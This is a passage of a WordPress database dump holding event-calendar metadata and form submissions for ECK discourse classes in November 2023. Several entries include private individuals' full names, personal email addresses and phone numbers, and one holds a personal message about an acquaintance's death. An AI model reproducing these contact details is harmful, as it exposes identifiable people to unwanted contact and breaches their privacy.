WP-Optimize'),(194464,269269,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:82271;s:12:\"smushed-size\";i:78426;s:15:\"savings-percent\";d:4.6699999999999999289457264239899814128875732421875;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:82271;s:10:\"compressed\";i:78426;}s:6:\"medium\";a:2:{s:8:\"original\";i:17117;s:10:\"compressed\";i:17111;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:6940;s:10:\"compressed\";i:6874;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:59876;s:10:\"compressed\";i:59876;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:21179;s:10:\"compressed\";i:21179;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:46099;s:10:\"compressed\";i:45804;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:33251;s:10:\"compressed\";i:33240;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:24122;s:10:\"compressed\";i:24047;}s:8:\"tileview\";a:2:{s:8:\"original\";i:24830;s:10:\"compressed\";i:24830;}}}'),(194549,269272,'protect_children',''),(194550,269272,'mec_color',''),(194551,269272,'mec_location_id','122'),(194552,269272,'mec_dont_show_map','0'),(194553,269272,'mec_organizer_id','1'),(194554,269272,'mec_read_more',''),(194555,269272,'mec_more_info',''),(194556,269272,'mec_more_info_title',''),(194557,269272,'mec_more_info_target','_self'),(194558,269272,'mec_cost',''),(194559,269272,'mec_currency','a:0:{}'),(194560,269272,'mec_additional_organizer_ids','a:0:{}'),(194561,269272,'mec_additional_location_ids','a:0:{}'),(194562,269272,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-11-19\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-11-19\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(194563,269272,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(194564,269272,'mec_certain_weekdays','a:0:{}'),(194565,269272,'mec_allday','0'),(194566,269272,'one_occurrence','0'),(194567,269272,'mec_hide_time','0'),(194568,269272,'mec_hide_end_time','0'),(194569,269272,'mec_comment',''),(194570,269272,'mec_timezone','global'),(194571,269272,'mec_countdown_method','global'),(194572,269272,'mec_public','1'),(194573,269272,'mec_start_date','2023-11-19'),(194574,269272,'mec_start_time_hour','10'),(194575,269272,'mec_start_time_minutes','30'),(194576,269272,'mec_start_time_ampm','AM'),(194577,269272,'mec_start_day_seconds','37800'),(194578,269272,'mec_end_date','2023-11-19'),(194579,269272,'mec_end_time_hour','11'),(194580,269272,'mec_end_time_minutes','30'),(194581,269272,'mec_end_time_ampm','AM'),(194582,269272,'mec_end_day_seconds','41400'),(194583,269272,'mec_repeat_status','0'),(194584,269272,'mec_repeat_type',''),(194585,269272,'mec_repeat_interval','1'),(194586,269272,'mec_repeat_end',''),(194587,269272,'mec_repeat_end_at_occurrences','9'),(194588,269272,'mec_repeat_end_at_date',''),(194589,269272,'mec_advanced_days','a:0:{}'),(194590,269272,'mec_in_days',''),(194591,269272,'mec_not_in_days',''),(194592,269272,'mec_hourly_schedules','a:0:{}'),(194593,269272,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(194627,269272,'mec_event_gallery','a:0:{}'),(194628,269272,'mec_related_events','a:0:{}'),(194594,269272,'mec_tickets','a:0:{}'),(194595,269272,'mec_fees_global_inheritance','1'),(194596,269272,'mec_fees','a:0:{}'),(194597,269272,'mec_ticket_variations_global_inheritance','1'),(194598,269272,'mec_ticket_variations','a:0:{}'),(194599,269272,'mec_reg_fields_global_inheritance','1'),(194600,269272,'mec_reg_fields','a:0:{}'),(194601,269272,'mec_bfixed_fields','a:0:{}'),(194602,269272,'mec_op','a:0:{}'),(194603,269272,'mec_fields','a:0:{}'),(194604,269272,'mec_event_status','EventScheduled'),(194605,269272,'mec_moved_online_link',''),(194606,269272,'mec_cancelled_reason',''),(194607,269272,'mec_display_cancellation_reason_in_single_page',''),(194608,269272,'boldgrid_hide_page_title','0'),(194609,269272,'mec_notifications','a:4:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:16:\"certificate_send\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Event Attendee Certificates\";s:7:\"content\";s:252:\"<p>Hi %%name%%,</p>\r\n<p>Congratulations for successfully attending / completing the event %%event_title%%.<br />\r\nClick the following link to download or print your PDF certificate.</p>\r\n<p>%%certificate_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(194610,269272,'passster_activate_global_protection',NULL),(194611,269272,'passster_activate_protection',NULL),(194612,269272,'passster_protection_type','password'),(194613,269272,'boldgrid_in_page_containers','1'),(194614,269272,'_thumbnail_id','269339'),(194616,269272,'_dp_original','267449'),(194617,269272,'_edit_lock','1698980547:2'),(194618,269272,'passster_area_shortcode',''),(194619,269272,'_edit_last','2'),(194620,269272,'mec_cost_auto_calculate','0'),(194621,269272,'mec_style_per_event','global'),(194622,269272,'mec_trailer_url',''),(194623,269272,'mec_trailer_title',''),(194624,269272,'mec_start_datetime','2023-11-19 10:30 AM'),(194625,269272,'mec_end_datetime','2023-11-19 11:30 AM'),(194626,269272,'mec_sequence','3'),(194629,269272,'mec_banner','a:0:{}'),(194785,269315,'_field_656','The ECK Satsang Discourses  Fourth Series - STARTS IN NOVEMBER -- 1st Monday at 700 pm - Zoom'),(194761,269308,'_field_654','Patricia '),(194762,269308,'_field_652','Lafferty '),(194763,269308,'_field_653','Bluestarlove1989@gmail.com'),(194764,269308,'_field_651','(303) 459-8422'),(194765,269308,'_field_656','The Master 1 Discourses - STARTS IN DECEMBER -- 2nd Monday at 700 pm - Zoom'),(194766,269308,'_field_649',''),(194767,269308,'_form_id','61'),(194768,269308,'_seq_num','98'),(195464,269366,'_field_654','Lynnzie'),(194773,269314,'_field_654','Mary'),(194774,269314,'_field_652','Griggs'),(194775,269314,'_field_653','marycatherinegriggs@gmail.com'),(194776,269314,'_field_651','(303) 912-8292'),(194777,269314,'_field_656','The ECK Satsang Discourses  Second Series - STARTS IN NOVEMBER -- 1st Tuesday at 700 pm - Zoom'),(194778,269314,'_field_649',''),(194779,269314,'_form_id','61'),(194780,269314,'_seq_num','99'),(194781,269315,'_field_654','Richard'),(194782,269315,'_field_652','Gray'),(194783,269315,'_field_653','richardpdgray@gmail.com'),(194784,269315,'_field_651','(719) 649-1806'),(194760,269301,'_wp_old_slug','the-power-of-grace-2-918'),(194759,269306,'_seq_num','149'),(194758,269306,'_form_id','13'),(194654,269301,'protect_children',''),(194655,269301,'mec_color',''),(194656,269301,'mec_location_id','166'),(194657,269301,'mec_dont_show_map','0'),(194658,269301,'mec_organizer_id','1'),(194659,269301,'mec_read_more',''),(194660,269301,'mec_more_info',''),(194661,269301,'mec_more_info_title',''),(194662,269301,'mec_more_info_target','_self'),(194663,269301,'mec_cost',''),(194664,269301,'mec_currency','a:0:{}'),(194665,269301,'mec_additional_organizer_ids','a:0:{}'),(194666,269301,'mec_additional_location_ids','a:0:{}'),(194667,269301,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-11-18\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-11-18\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(194668,269301,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(194669,269301,'mec_certain_weekdays','a:0:{}'),(194670,269301,'mec_allday','0'),(194671,269301,'one_occurrence','0'),(194672,269301,'mec_hide_time','0'),(194673,269301,'mec_hide_end_time','0'),(194674,269301,'mec_comment',''),(194675,269301,'mec_timezone','global'),(194676,269301,'mec_countdown_method','global'),(194677,269301,'mec_public','1'),(194678,269301,'mec_start_date','2023-11-18'),(194679,269301,'mec_start_time_hour','1'),(194680,269301,'mec_start_time_minutes','30'),(194681,269301,'mec_start_time_ampm','PM'),(194682,269301,'mec_start_day_seconds','48600'),(194683,269301,'mec_end_date','2023-11-18'),(194684,269301,'mec_end_time_hour','2'),(194685,269301,'mec_end_time_minutes','30'),(194686,269301,'mec_end_time_ampm','PM'),(194687,269301,'mec_end_day_seconds','52200'),(194688,269301,'mec_repeat_status','0'),(194689,269301,'mec_repeat_type',''),(194690,269301,'mec_repeat_interval','1'),(194691,269301,'mec_repeat_end',''),(194692,269301,'mec_repeat_end_at_occurrences','9'),(194693,269301,'mec_repeat_end_at_date',''),(194694,269301,'mec_advanced_days','a:0:{}'),(194695,269301,'mec_in_days',''),(194696,269301,'mec_not_in_days',''),(194697,269301,'mec_hourly_schedules','a:0:{}'),(194698,269301,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(194699,269301,'mec_tickets','a:0:{}'),(194700,269301,'mec_fees_global_inheritance','1'),(194701,269301,'mec_fees','a:0:{}'),(194702,269301,'mec_ticket_variations_global_inheritance','1'),(194703,269301,'mec_ticket_variations','a:0:{}'),(194704,269301,'mec_reg_fields_global_inheritance','1'),(194705,269301,'mec_reg_fields','a:0:{}'),(194706,269301,'mec_bfixed_fields','a:0:{}'),(194707,269301,'mec_op','a:0:{}'),(194708,269301,'mec_fields','a:0:{}'),(194709,269301,'mec_event_status','EventScheduled'),(194710,269301,'mec_moved_online_link',''),(194711,269301,'mec_cancelled_reason',''),(194712,269301,'mec_display_cancellation_reason_in_single_page',''),(194713,269301,'boldgrid_hide_page_title','0'),(194714,269301,'mec_notifications','a:4:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:16:\"certificate_send\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Event Attendee Certificates\";s:7:\"content\";s:252:\"<p>Hi %%name%%,</p>\r\n<p>Congratulations for successfully attending / completing the event %%event_title%%.<br />\r\nClick the following link to download or print your PDF certificate.</p>\r\n<p>%%certificate_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(194715,269301,'passster_activate_global_protection',''),(194716,269301,'passster_activate_protection',''),(194717,269301,'passster_protection_type','password'),(194718,269301,'boldgrid_in_page_containers','1'),(194719,269301,'_dp_original','267696'),(194720,269301,'passster_area_shortcode',''),(194721,269301,'_wp_old_date','2023-01-14'),(194722,269301,'mec_cost_auto_calculate','0'),(194723,269301,'mec_style_per_event','global'),(194724,269301,'mec_trailer_url',''),(194725,269301,'mec_trailer_title',''),(194726,269301,'mec_start_datetime','2023-11-18 01:30 PM'),(194727,269301,'mec_end_datetime','2023-11-18 02:30 PM'),(194728,269301,'mec_sequence','3'),(194729,269301,'mec_event_gallery','a:0:{}'),(194730,269301,'mec_related_events','a:0:{}'),(194731,269301,'mec_banner','a:0:{}'),(194732,269301,'_edit_lock','1698549877:2'),(194733,269301,'_edit_last','2'),(194734,269301,'_thumbnail_id','269303'),(194735,269303,'_wp_attached_file','2023/10/ColumnsWater.webp'),(194736,269303,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:338;s:4:\"file\";s:25:\"2023/10/ColumnsWater.webp\";s:8:\"filesize\";i:18200;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"ColumnsWater-348x196.webp\";s:5:\"width\";i:348;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:5178;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"ColumnsWater-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:2340;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:25:\"ColumnsWater-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:5866;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:25:\"ColumnsWater-500x338.webp\";s:5:\"width\";i:500;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:11738;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:25:\"ColumnsWater-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:9234;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:25:\"ColumnsWater-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:7080;}s:8:\"tileview\";a:5:{s:4:\"file\";s:25:\"ColumnsWater-300x338.webp\";s:5:\"width\";i:300;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:7184;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(194737,269304,'_field_654','David'),(194738,269304,'_field_652','Ogletree'),(194739,269304,'_field_653','dogle007@yahoo.com'),(194740,269304,'_field_651','(316) 806-2188'),(194741,269304,'_field_656','Soul Travel 2 - STARTS IN NOVEMBER -- 3rd Saturday at 400-530 pm - Florence-Hybrid'),(194742,269304,'_field_649',''),(194743,269304,'_form_id','61'),(194744,269304,'_seq_num','96'),(194745,269305,'_field_654','Diane'),(194746,269305,'_field_652','Ogletree '),(194747,269305,'_field_653','dm.launsby@gmail.com'),(194748,269305,'_field_651','(719) 661-6843'),(194749,269305,'_field_656','Soul Travel 2 - STARTS IN NOVEMBER -- 3rd Saturday at 400-530 pm - Florence-Hybrid'),(194750,269305,'_field_649',''),(194751,269305,'_form_id','61'),(194752,269305,'_seq_num','97'),(194753,269306,'_field_133','Carol'),(194754,269306,'_field_134','Hoedeman'),(194755,269306,'_field_135','choedeman@shaw.ca'),(194756,269306,'_field_137','Luisa Natale Garland'),(194757,269306,'_field_138','Hello, I am a longtime ECK member from Canada. I have known Luisa since early days in ECK but haven\'t been in touch with her since COVID. We used to reconnect at seminars often but I didn\'t see her at this seminar. Upon inquiring, a Minneapolis chela said that she had translated in the past year. I was surprised as the news hadn\'t made it up to our area in British Columbia. \nI would like to confirm that she did translate as I can\'t seem to find any indication online and to perhaps have a link to her obituary or celebration of life as the chela mentioned that there was a celebration held.\nThank you for letting me know. I appreciate it.\nLuisa was a dear Soul that I am very grateful to have shared precious time with over the years.\nIn love and grace,\nCarol Hoedeman, South Vancouver Island Spiritual Services Coordinator '),(194786,269315,'_field_649',''),(194787,269315,'_form_id','61'),(194788,269315,'_seq_num','100'),(194789,269316,'_field_224','Mollie'),(194790,269316,'_field_225','Goodale'),(194791,269316,'_field_226','mollie.goodale@gmail.com'),(194792,269316,'_field_227','CO'),(194793,269316,'_field_228','US'),(194794,269316,'_field_229','a:1:{i:0;s:8:\"Loveland\";}'),(194795,269316,'_form_id','21'),(194796,269316,'_seq_num','189'),(195480,269368,'_field_654','Kathleen'),(194801,269319,'_field_654','Colleyna'),(194802,269319,'_field_652','Danler'),(194803,269319,'_field_653','colleynadanler@hotmail.com'),(194804,269319,'_field_651','(801) 558-9074'),(194805,269319,'_field_656','The ECK Satsang Discourses  First Series - STARTS IN NOVEMBER -- 1st Sunday at 1200  130 pm - Zoom'),(194806,269319,'_field_649',''),(194807,269319,'_form_id','61'),(194808,269319,'_seq_num','101'),(194809,269320,'_field_654','Anna'),(194810,269320,'_field_652','Lafferty'),(194811,269320,'_field_653','alaffertyhu@gmail.com'),(194812,269320,'_field_651','(720) 480-7454'),(194813,269320,'_field_656','The Master 2 Discourses - STARTS IN NOVEMBER -- 2nd Wednesday at 730 pm - Zoom'),(194814,269320,'_field_649',''),(194815,269320,'_form_id','61'),(194816,269320,'_seq_num','102'),(194817,269321,'_field_654','Lisa'),(194818,269321,'_field_652','Gerstner Boston'),(194819,269321,'_field_653','lisagboston@gmail.com'),(194820,269321,'_field_651','(303) 589-7677'),(194821,269321,'_field_656','The ECK Satsang Discourses  Fourth Series - STARTS IN NOVEMBER -- 1st Monday at 700 pm - Zoom'),(194822,269321,'_field_649',''),(194823,269321,'_form_id','61'),(194824,269321,'_seq_num','103'),(194912,269323,'_edit_lock','1698939696:2'),(194913,269323,'_edit_last','2'),(194914,269324,'protect_children',''),(194915,269324,'mec_color',''),(194916,269324,'mec_location_id','185'),(194917,269324,'mec_dont_show_map','0'),(194918,269324,'mec_organizer_id','1'),(194919,269324,'mec_start_date','2023-11-26'),(194920,269324,'mec_start_time_hour','10'),(194921,269324,'mec_start_time_minutes','30'),(194922,269324,'mec_start_time_ampm','AM'),(194923,269324,'mec_start_day_seconds','37800'),(194924,269324,'mec_end_date','2023-11-26'),(194925,269324,'mec_end_time_hour','11'),(194926,269324,'mec_end_time_minutes','30'),(194927,269324,'mec_end_time_ampm','AM'),(194928,269324,'mec_end_day_seconds','41400'),(194929,269324,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-11-26\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-11-26\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.4\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(194930,269324,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.4\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(194931,269324,'mec_certain_weekdays','a:0:{}'),(194932,269324,'mec_allday','0'),(194933,269324,'mec_hide_time','0'),(194934,269324,'mec_hide_end_time','0'),(194935,269324,'mec_comment',''),(194936,269324,'mec_repeat_status','1'),(194937,269324,'mec_repeat_type','advanced'),(194938,269324,'mec_repeat_interval','1'),(194939,269324,'mec_repeat_end','never'),(194940,269324,'mec_repeat_end_at_occurrences','9'),(194941,269324,'mec_repeat_end_at_date',''),(194942,269324,'mec_advanced_days','a:1:{i:0;s:5:\"Sun.4\";}'),(194943,269324,'mec_in_days',''),(194944,269324,'mec_not_in_days',''),(194945,269324,'mec_hourly_schedules','a:0:{}'),(194946,269324,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(194947,269324,'mec_tickets','a:0:{}'),(194948,269324,'mec_fees_global_inheritance','1'),(194949,269324,'mec_fees','a:0:{}'),(194950,269324,'mec_ticket_variations_global_inheritance','1'),(194951,269324,'mec_ticket_variations','a:0:{}'),(194952,269324,'mec_reg_fields_global_inheritance','1'),(194953,269324,'mec_reg_fields','a:0:{}'),(194954,269324,'mec_op','a:0:{}'),(194955,269324,'mec_event_date_submit','20210422105713'),(194956,269324,'mec_read_more',''),(194957,269324,'mec_more_info',''),(194958,269324,'mec_more_info_title',''),(194959,269324,'mec_more_info_target','_self'),(194960,269324,'mec_cost',''),(194961,269324,'mec_currency','a:0:{}'),(194962,269324,'mec_additional_organizer_ids','a:0:{}'),(194963,269324,'mec_additional_location_ids','a:0:{}'),(194964,269324,'one_occurrence','0'),(194965,269324,'mec_timezone','global'),(194966,269324,'mec_countdown_method','global'),(194967,269324,'mec_public','1'),(194968,269324,'mec_bfixed_fields','a:0:{}'),(194969,269324,'mec_fields','a:0:{}'),(194970,269324,'mec_event_status','EventScheduled'),(194971,269324,'mec_moved_online_link',''),(194972,269324,'mec_cancelled_reason',''),(194973,269324,'mec_display_cancellation_reason_in_single_page',''),(194974,269324,'mec_notifications','a:4:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:16:\"certificate_send\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Event Attendee Certificates\";s:7:\"content\";s:252:\"<p>Hi %%name%%,</p>\r\n<p>Congratulations for successfully attending / completing the event %%event_title%%.<br />\r\nClick the following link to download or print your PDF certificate.</p>\r\n<p>%%certificate_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(194975,269324,'passster_activate_global_protection',NULL),(194976,269324,'passster_activate_protection',NULL),(194977,269324,'passster_protection_type','password'),(194978,269324,'_wp_old_date','2022-01-18'),(194979,269324,'boldgrid_in_page_containers','1'),(194992,269324,'_dp_original','268251'),(194981,269324,'passster_area_shortcode',''),(194982,269324,'mec_cost_auto_calculate','0'),(194983,269324,'mec_style_per_event','global'),(194984,269324,'mec_trailer_url',''),(194985,269324,'mec_trailer_title',''),(194986,269324,'mec_start_datetime','2023-11-26 10:30 AM'),(194987,269324,'mec_end_datetime','2023-11-26 11:30 AM'),(194988,269324,'mec_sequence','11'),(194989,269324,'mec_event_gallery','a:0:{}'),(194990,269324,'mec_related_events','a:0:{}'),(194991,269324,'mec_banner','a:0:{}'),(194993,269324,'_edit_lock','1698956946:2'),(194994,269324,'_edit_last','2'),(194995,269325,'_wp_attached_file','2023/11/hu-sos-golden-2.jpg'),(194996,269325,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:803;s:6:\"height\";i:450;s:4:\"file\";s:27:\"2023/11/hu-sos-golden-2.jpg\";s:8:\"filesize\";i:71272;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"hu-sos-golden-2-350x196.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16687;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"hu-sos-golden-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7069;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"hu-sos-golden-2-768x430.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:430;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:55329;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:27:\"hu-sos-golden-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20263;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:27:\"hu-sos-golden-2-500x450.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:43865;}s:16:\"mecc